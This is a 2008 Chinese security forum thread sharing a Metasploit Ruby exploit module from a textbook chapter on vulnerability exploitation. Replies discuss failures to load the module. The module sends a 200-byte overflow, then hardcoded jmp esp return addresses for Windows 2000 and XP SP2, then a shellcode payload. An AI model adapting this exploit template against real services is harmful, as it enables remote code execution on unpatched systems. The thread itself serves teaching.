首页
社区
课程
招聘
[讨论]第10章漏洞的中文通用溢出ruby脚本
发表于: 2008-7-7 15:09 6609

[讨论]第10章漏洞的中文通用溢出ruby脚本

2008-7-7 15:09
6609
//其实就使用了通用跳转地址,jmp esp 0x7FFA4512
#/*****************************************************************************
#      To be the apostrophe which changed "Impossible" into "I'm possible"!
#               
#POC code of chapter 10.6 in book "Vulnerability Exploit and Analysis Technique"
#
#file name        : test.rb
#author                : failwest  
#date                : 2007.4.4
#description        : used as a demo to show how to implemented exploit module of MSF
#Noticed        : create a sub directory named "failwest" in the exploit directory
#                  of MSF 3.0. For example, the default directory of exploit is
#                  "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
#                  this module should be put into
#                  "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version        : 1.0
#E-mail                : failwest@gmail.com
#               
#        Only for educational purposes    enjoy the fun from exploiting :)
#******************************************************************************/
require 'msf/core'
module Msf
class Exploits::Failwest::Test < Msf::Exploit::Remote
include Exploit::Remote::Tcp
       
        def initialize(info = {})
            super(update_info(info,
                'Name'                => 'failwest_test',
                'Platform'        => 'win',
                'Targets'        => [
                                        ['Windows 2000',  {'Ret' => 0x7FFA4512 } ],
                                        ['Windows XP SP2',{'Ret' => 0x7C914393 } ]
                                   ],
                'Payload'       => {
                                        'Space'    => 200,
                                        'BadChars' => "\x00",
                                    }
                ))
        end #end of initialize

        def exploit
                connect
                attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
                sock.put(attack_buf)       
                handler
                disconnect
        end  #end of exploit def
end #end of class def
end #end of module def

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 25
活跃值: (477)
能力值: (RANK:20 )
在线值:
发帖
回帖
粉丝
2
111111111111
2008-7-7 16:41
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
1.
我发现在自己的机子里无法执行该脚本,show exploits时没有显示,use failwest/test也是出现错误:[-] Failed to load module: failwest/test!(文件位置等完全按照书中所述).
2.
将有ruby语句的文本保存为以rb后缀的文件后,在"CMD shell"下无法执行:ruby: No such file or directory -- aa.rb (LoadError)!

请问是什么原因!
2008-8-20 10:23
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
第二个已经知道,我隐藏了文件的扩展名!
2008-8-20 10:51
0
雪    币: 51
活跃值: (27)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
楼主第一个解决了么
2014-7-28 14:05
0
游客
登录 | 注册 方可回帖
返回
//